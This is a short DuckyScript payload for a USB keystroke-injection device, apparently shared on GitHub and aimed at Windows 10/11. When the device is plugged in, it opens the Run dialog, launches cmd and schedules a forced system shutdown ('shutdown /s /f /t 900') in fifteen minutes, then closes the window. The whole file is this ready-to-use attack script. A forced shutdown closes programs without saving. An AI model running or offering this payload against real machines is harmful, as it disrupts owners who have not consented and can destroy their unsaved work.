REM ┌──────────────────────────────────────────────────────────────────┐
REM │ hooker01 | github.com/hooker01                                   │
REM │ Description: Initiates a forced system shutdown on Windows       │
REM │              after a 15-minute delay                             │
REM │ Target: Windows 10/11                                            │                                                                  
REM └──────────────────────────────────────────────────────────────────┘

DELAY 100
GUI r
DELAY 300
STRING cmd /c start "" shutdown /s /f /t 900
DELAY 300
ENTER
DELAY 300
STRING exit
DELAY 300
ENTER

